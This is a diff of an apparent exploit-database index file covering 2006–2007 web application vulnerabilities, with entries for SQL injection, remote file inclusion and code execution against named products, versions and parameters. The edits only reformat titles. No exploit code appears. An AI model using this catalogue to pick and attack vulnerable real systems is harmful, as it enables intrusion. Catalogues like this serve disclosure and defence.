-3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php popen()' Remote Injection",2006-12-27,rgod,php,webapps,0 +3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - 'cmd.php?popen()' Remote Injection",2006-12-27,rgod,php,webapps,0 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - 'faqDsp.asp catcode' SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 -3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0 +3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - Acronym Mod SQL Injection",2006-12-28,"the master",php,webapps,0 3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - Authentication Bypass",2006-12-28,ajann,asp,webapps,0 3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,php,webapps,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,php,webapps,0 @@ -17893,13 +17894,13 @@ id,file,description,date,author,platform,type,port 3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0 3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - 'viewsrc.asp' Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - 'user.dat' Password Disclosure",2006-12-30,bd0rk,php,webapps,0 -3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - (key) SQL Injection",2006-12-30,ajann,asp,webapps,0 +3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - 'key' SQL Injection",2006-12-30,ajann,asp,webapps,0 3049,platforms/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 -3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 -3051,platforms/php/webapps/3051.txt,"WordPress Plugin Enigma 2 Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 +3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 +3051,platforms/php/webapps/3051.txt,"WordPress Plugin Enigma 2 Bridge - 'boarddir' Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3054,platforms/php/webapps/3054.txt,"P-News 1.16/1.17 - 'user.dat' Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 -3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution",2006-12-31,Kacper,php,webapps,0 +3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - 'PNSVlang' Remote Code Execution",2006-12-31,Kacper,php,webapps,0 3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - 'bu_dir' Multiple Remote File Inclusions",2006-12-31,DeltahackingTEAM,php,webapps,0 3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - 'admin.mdb' Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp?id' SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 @@ -17907,12 +17908,12 @@ id,file,description,date,author,platform,type,port 3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - 'Customize.asp' Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 -3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 +3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - 'subcatID' SQL Injection",2007-01-03,ajann,asp,webapps,0 3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - 'language.php' Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - '/inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 -3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 +3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - 'book_id' SQL Injection",2007-01-04,ajann,asp,webapps,0 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php?id' SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 @@ -17931,15 +17932,15 @@ id,file,description,date,author,platform,type,port 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,php,webapps,0 3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - 'wp-trackback.php' SQL Injection",2007-01-10,rgod,php,webapps,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,php,webapps,0 -3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 +3114,platforms/php/webapps/3114.txt,"Article System 0.1 - 'INCLUDE_DIR' Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting",2007-01-11,ajann,asp,webapps,0 3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,php,webapps,0 -3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - 'show.php PollDir' Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 -3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - 'i-accueil.php chemin' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 +3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - 'show.php?PollDir' Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 +3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - 'i-accueil.php?chemin' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - 'duyuru.asp id' SQL Injection",2007-01-12,chernobiLe,php,webapps,0 3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' SQL Injection",2007-01-13,ajann,asp,webapps,0 -3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion",2007-01-13,ajann,php,webapps,0 +3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - 'path' Remote File Inclusion",2007-01-13,ajann,php,webapps,0 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 3134,platforms/php/webapps/3134.php,"KGB 1.9 - 'sesskglogadmin.php' Local File Inclusion",2007-01-15,Kacper,php,webapps,0 @@ -17955,18 +17956,18 @@ id,file,description,date,author,platform,type,port 3153,platforms/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,php,webapps,0 3161,platforms/php/webapps/3161.txt,"PHPSherpa - '/include/config.inc.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - '/include/includes.php' Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 -3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - 'nl.php g_strRootDir' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - 'nl.php?g_strRootDir' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3164,platforms/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - 'config.php' Remote File Inclusion",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b - 'up.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - 'defines.php WEBCHATPATH' Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 -3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - 'index.php gen' Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 +3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - 'defines.php?WEBCHATPATH' Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 +3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - 'index.php?gen' Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps,0 -3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - 'top.php maindir' Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 +3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - 'top.php?maindir' Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - 'functions.visohotlink.php' Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0 -3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - 'poll_frame.php poll_id' Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 +3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - 'poll_frame.php?poll_id' Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - 'selectlang.php' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 -3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 -3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - 'config.php sql_language' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 +3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - 'path' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 +3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - 'config.php?sql_language' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - 'user.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0 3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - 'news_detail.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - 'MODULES_DIR' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 @@ -17977,9 +17978,9 @@ id,file,description,date,author,platform,type,port 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - SQL Injection / Cross-Site Scripting",2007-01-25,ajann,asp,webapps,0 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - '/vp/configure.php' Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - 'package.php' Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0 -3202,platforms/php/webapps/3202.txt,"AINS 0.02b - 'ains_main.php ains_path' Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 +3202,platforms/php/webapps/3202.txt,"AINS 0.02b - 'ains_main.php?ains_path' Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 3203,platforms/php/webapps/3203.txt,"FD Script 1.3.2 - 'download.php' Remote File Disclosure",2007-01-26,ajann,php,webapps,0 -3205,platforms/php/webapps/3205.txt,"nsGalPHP - '/includes/config.inc.php racineTBS' Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 +3205,platforms/php/webapps/3205.txt,"nsGalPHP - '/includes/config.inc.php?racineTBS' Remote File Inclusion",2007-01-27,S.W.A.T.,php,webapps,0 3206,platforms/php/webapps/3206.txt,"ACGVclick 0.2.0 - 'path' Remote File Inclusion",2007-01-27,ajann,php,webapps,0 3207,platforms/php/webapps/3207.pl,"Drunken:Golem Portal 0.5.1 Alpha 2 - Remote File Inclusion",2007-01-27,MackRulZ,php,webapps,0 3208,platforms/php/webapps/3208.txt,"ACGVannu 1.3 - 'index2.php' Remote User Pass Change",2007-01-27,ajann,php,webapps,0 @@ -17998,128 +17999,128 @@ id,file,description,date,author,platform,type,port 3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - 'themefunc.php' Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0 3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0 3232,platforms/php/webapps/3232.txt,"Michelles L2J Dropcalc 4 - SQL Injection",2007-01-31,Codebreak,php,webapps,0 -3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 +3233,platforms/asp/webapps/3233.txt,"Fullaspsite Asp Hosting Sitesi - 'tr' SQL Injection",2007-01-31,cl24zy,asp,webapps,0 3234,platforms/php/webapps/3234.txt,"ExoPHPDesk 1.2.1 - 'faq.php' SQL Injection",2007-01-31,ajann,php,webapps,0 3235,platforms/php/webapps/3235.txt,"phpBB Tweaked 3 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3236,platforms/php/webapps/3236.txt,"Hailboards 1.2.0 - 'phpbb_root_path' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3237,platforms/php/webapps/3237.txt,"Cadre PHP Framework - Remote File Inclusion",2007-01-31,y3dips,php,webapps,0 -3238,platforms/php/webapps/3238.txt,"PHPMyRing 4.1.3b - (fichier) Remote File Inclusion",2007-01-31,ajann,php,webapps,0 +3238,platforms/php/webapps/3238.txt,"PHPMyRing 4.1.3b - 'fichier' Remote File Inclusion",2007-01-31,ajann,php,webapps,0 3239,platforms/php/webapps/3239.htm,"Extcalendar 2 - 'profile.php' Remote User Pass Change Exploit",2007-01-31,ajann,php,webapps,0 3240,platforms/php/webapps/3240.txt,"JV2 Folder Gallery 3.0 - Remote File Inclusion",2007-01-31,"ThE dE@Th",php,webapps,0 -3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti - (tr) SQL Injection",2007-01-31,cl24zy,asp,webapps,0 +3241,platforms/asp/webapps/3241.txt,"Hunkaray Duyuru Scripti - 'tr' SQL Injection",2007-01-31,cl24zy,asp,webapps,0 3242,platforms/php/webapps/3242.txt,"Omegaboard 1.0beta4 - 'functions.php' Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3243,platforms/php/webapps/3243.txt,"Cerulean Portal System 0.7b - Remote File Inclusion",2007-01-31,"Mehmet Ince",php,webapps,0 3245,platforms/php/webapps/3245.txt,"SIPS 0.3.1 - 'box.inc.php' Remote File Inclusion",2007-02-01,ajann,php,webapps,0 -3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - (level) Remote File Inclusion",2007-02-01,"Mehmet Ince",php,webapps,0 -3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - 'common.php inc_path' Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 +3246,platforms/php/webapps/3246.txt,"phpEventMan 1.0.2 - 'level' Remote File Inclusion",2007-02-01,"Mehmet Ince",php,webapps,0 +3247,platforms/php/webapps/3247.txt,"Epistemon 1.0 - 'common.php?inc_path' Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 3249,platforms/php/webapps/3249.txt,"WebBuilder 2.0 - 'StageLoader.php' Remote File Inclusion",2007-02-01,GoLd_M,php,webapps,0 3250,platforms/php/webapps/3250.txt,"Portail Web PHP 2.5.1 - 'includes.php' Remote File Inclusion",2007-02-01,"laurent gaffié",php,webapps,0 3251,platforms/php/webapps/3251.txt,"CoD2: DreamStats 4.2 - 'index.php' Remote File Inclusion",2007-02-02,"ThE dE@Th",php,webapps,0 3252,platforms/php/webapps/3252.txt,"EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup",2007-02-02,Eight10,php,webapps,0 -3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - 'poll.php root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 +3253,platforms/php/webapps/3253.txt,"Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 3255,platforms/php/webapps/3255.php,"F3Site 2.1 - Remote Code Execution",2007-02-02,Kacper,php,webapps,0 -3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - (c_id) SQL Injection",2007-02-02,ajann,php,webapps,0 -3258,platforms/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - (ezconvert_dir) Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 +3256,platforms/php/webapps/3256.txt,"dB Masters Curium CMS 1.03 - 'c_id' SQL Injection",2007-02-02,ajann,php,webapps,0 +3258,platforms/php/webapps/3258.txt,"phpBB ezBoard Converter 0.2 - 'ezconvert_dir' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 3259,platforms/php/webapps/3259.pl,"phpBB++ Build 100 - 'phpbb_root_path' Remote File Inclusion",2007-02-02,"Mehmet Ince",php,webapps,0 3261,platforms/php/webapps/3261.txt,"Photo Galerie Standard 1.1 - 'view.php' SQL Injection",2007-02-03,ajann,php,webapps,0 3262,platforms/php/webapps/3262.php,"Woltlab Burning Board Lite 1.0.2pl3e - 'pms.php' SQL Injection",2007-02-03,rgod,php,webapps,0 -3263,platforms/php/webapps/3263.txt,"KDPics 1.11 - 'exif.php lib_path' Remote File Inclusion",2007-02-03,AsTrex,php,webapps,0 -3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - 'previewtheme.php inc_path' Remote File Inclusion",2007-02-04,GoLd_M,php,webapps,0 +3263,platforms/php/webapps/3263.txt,"KDPics 1.11 - 'exif.php?lib_path' Remote File Inclusion",2007-02-03,AsTrex,php,webapps,0 +3266,platforms/php/webapps/3266.txt,"Flip 2.01 final - 'previewtheme.php?inc_path' Remote File Inclusion",2007-02-04,GoLd_M,php,webapps,0 3267,platforms/php/webapps/3267.txt,"Geeklog 2 - 'BaseView.php' Remote File Inclusion",2007-02-05,GoLd_M,php,webapps,0 3268,platforms/php/webapps/3268.txt,"SMA-DB 0.3.9 - 'settings.php' Remote File Inclusion",2007-02-05,"ThE dE@Th",php,webapps,0 3270,platforms/php/webapps/3270.pl,"Categories hierarchy phpBB Mod 2.1.2 - 'phpbb_root_path' Remote File Inclusion",2007-02-05,"Mehmet Ince",php,webapps,0 3271,platforms/php/webapps/3271.php,"GGCMS 1.1.0 RC1 - Remote Code Execution",2007-02-05,Kacper,php,webapps,0 3275,platforms/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,php,webapps,0 -3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - (tr) SQL Injection",2007-02-06,cl24zy,php,webapps,0 -3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - 'top.inc.php rootdir' Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 +3278,platforms/php/webapps/3278.txt,"Kisisel Site 2007 - 'tr' SQL Injection",2007-02-06,cl24zy,php,webapps,0 +3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - 'top.inc.php?rootdir' Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - 'index_album.php' Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - SQL Injection / Cross-Site Scripting",2007-02-07,GregStar,php,webapps,0 3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Remote File Inclusion",2007-02-07,Denven,php,webapps,0 -3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0 -3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - 'index.php projectid' SQL Injection",2007-02-08,ajann,php,webapps,0 +3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - 'paths[version]' Remote File Inclusion",2007-02-08,ajann,php,webapps,0 +3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - 'index.php?projectid' SQL Injection",2007-02-08,ajann,php,webapps,0 3287,platforms/php/webapps/3287.asp,"LushiNews 1.01 - 'comments.php' SQL Injection",2007-02-08,ajann,php,webapps,0 3288,platforms/php/webapps/3288.asp,"LushiWarPlaner 1.0 - 'register.php' SQL Injection",2007-02-08,ajann,php,webapps,0 3292,platforms/php/webapps/3292.txt,"OPENi-CMS Site Protection Plugin - Remote File Inclusion",2007-02-11,y3dips,php,webapps,0 3295,platforms/asp/webapps/3295.txt,"philboard 1.14 - 'philboard_forum.asp' SQL Injection",2007-02-12,"Mehmet Ince",asp,webapps,0 -3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - (Root_To_Script) Remote File Inclusion",2007-02-13,ajann,php,webapps,0 +3297,platforms/php/webapps/3297.htm,"AT Contenator 1.0 - 'Root_To_Script' Remote File Inclusion",2007-02-13,ajann,php,webapps,0 3298,platforms/php/webapps/3298.pl,"Xaran CMS 2.0 - 'xarancms_haupt.php' SQL Injection",2007-02-13,ajann,php,webapps,0 -3299,platforms/php/webapps/3299.pl,"PHPCC 4.2 Beta - 'nickpage.php npid' SQL Injection",2007-02-13,ajann,php,webapps,0 +3299,platforms/php/webapps/3299.pl,"PHPCC 4.2 Beta - 'nickpage.php?npid' SQL Injection",2007-02-13,ajann,php,webapps,0 3300,platforms/php/webapps/3300.pl,"Advanced Poll 2.0.5-dev - Remote Code Execution",2007-02-13,diwou,php,webapps,0 3301,platforms/asp/webapps/3301.txt,"PollMentor 2.0 - 'pollmentorres.asp id' SQL Injection",2007-02-13,SaO,asp,webapps,0 3305,platforms/php/webapps/3305.txt,"nabopoll 1.2 - Remote Unprotected Admin Section",2007-02-13,sn0oPy,php,webapps,0 3309,platforms/php/webapps/3309.txt,"Jupiter CMS 1.1.5 - '/index.php' Local/Remote File Inclusion",2007-02-14,DarkFig,php,webapps,0 -3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - (Client-IP) SQL Injection",2007-02-14,DarkFig,php,webapps,0 +3310,platforms/php/webapps/3310.php,"Jupiter CMS 1.1.5 - 'Client-IP' SQL Injection",2007-02-14,DarkFig,php,webapps,0 3311,platforms/php/webapps/3311.php,"Jupiter CMS 1.1.5 - Arbitrary File Upload",2007-02-14,DarkFig,php,webapps,0 -3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - (Post Comments) Remote Command Execution",2007-02-15,str0ke,php,webapps,0 -3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - (Post Comments) Remote Command Execution",2007-02-15,str0ke,php,webapps,0 +3312,platforms/php/webapps/3312.pl,"Drupal < 5.1 - Post Comments Remote Command Execution",2007-02-15,str0ke,php,webapps,0 +3313,platforms/php/webapps/3313.pl,"Drupal < 4.7.6 - Post Comments Remote Command Execution",2007-02-15,str0ke,php,webapps,0 3314,platforms/php/webapps/3314.txt,"ZebraFeeds 1.0 - 'zf_path' Remote File Inclusion",2007-02-15,"ThE dE@Th",php,webapps,0 -3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - 'survey.inc.php path' Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 +3315,platforms/php/webapps/3315.txt,"nabopoll 1.2 - 'survey.inc.php?path' Remote File Inclusion",2007-02-15,Cr@zy_King,php,webapps,0 3317,platforms/asp/webapps/3317.txt,"CodeAvalanche News 1.x - 'CAT_ID' SQL Injection",2007-02-15,beks,asp,webapps,0 3318,platforms/asp/webapps/3318.txt,"Aktueldownload Haber scripti - 'id' SQL Injection",2007-02-15,"Mehmet Ince",asp,webapps,0 3321,platforms/asp/webapps/3321.txt,"Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection",2007-02-16,"Mehmet Ince",asp,webapps,0 -3322,platforms/php/webapps/3322.htm,"VS-News-System 1.2.1 - (newsordner) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 -3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - (script_pfad) Remote File Inclusion",2007-02-16,ajann,php,webapps,0 -3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - (ht_pfad) Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0 -3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - (showonly) Blind SQL Injection",2007-02-16,DNX,php,webapps,0 +3322,platforms/php/webapps/3322.htm,"VS-News-System 1.2.1 - 'newsordner' Remote File Inclusion",2007-02-16,ajann,php,webapps,0 +3323,platforms/php/webapps/3323.htm,"VS-Link-Partner 2.1 - 'script_pfad' Remote File Inclusion",2007-02-16,ajann,php,webapps,0 +3324,platforms/php/webapps/3324.txt,"Htaccess Passwort Generator 1.1 - 'ht_pfad' Remote File Inclusion",2007-02-16,kezzap66345,php,webapps,0 +3325,platforms/php/webapps/3325.pl,"webSPELL 4.01.02 - 'showonly' Blind SQL Injection",2007-02-16,DNX,php,webapps,0 3326,platforms/php/webapps/3326.txt,"Vivvo Article Manager 3.4 - 'root' Local File Inclusion",2007-02-16,Snip0r,php,webapps,0 3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 - 'album' SQL Injection",2007-02-17,Bl0od3r,php,webapps,0 -3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - (gb_pfad) Remote File Inclusion",2007-02-18,ajann,php,webapps,0 +3328,platforms/php/webapps/3328.htm,"S-Gastebuch 1.5.3 - 'gb_pfad' Remote File Inclusion",2007-02-18,ajann,php,webapps,0 3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 - 'archives.php' Remote File Disclosure",2007-02-18,r0ut3r,php,webapps,0 3334,platforms/php/webapps/3334.asp,"PHP-Nuke Module Emporium 2.3.0 - SQL Injection",2007-02-19,ajann,php,webapps,0 3336,platforms/php/webapps/3336.txt,"Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion",2007-02-20,kezzap66345,php,webapps,0 3337,platforms/php/webapps/3337.php,"NukeSentinel 2.5.05 - 'nsbypass.php' Blind SQL Injection",2007-02-20,DarkFig,php,webapps,0 3338,platforms/php/webapps/3338.php,"NukeSentinel 2.5.05 - 'nukesentinel.php' File Disclosure",2007-02-20,DarkFig,php,webapps,0 3339,platforms/asp/webapps/3339.txt,"Online Web Building 2.0 - 'id' SQL Injection",2007-02-20,"Mehmet Ince",asp,webapps,0 -3344,platforms/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - (INSERT) Blind SQL Injection (MySQL)",2007-02-20,krasza,php,webapps,0 -3345,platforms/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - (INSERT) SQL Injection",2007-02-20,krasza,php,webapps,0 -3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection",2007-02-20,krasza,php,webapps,0 -3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 +3344,platforms/php/webapps/3344.pl,"PHP-Nuke 8.0 Final - 'INSERT' Blind SQL Injection (MySQL)",2007-02-20,krasza,php,webapps,0 +3345,platforms/php/webapps/3345.pl,"PHP-Nuke 8.0 Final - 'INSERT' SQL Injection",2007-02-20,krasza,php,webapps,0 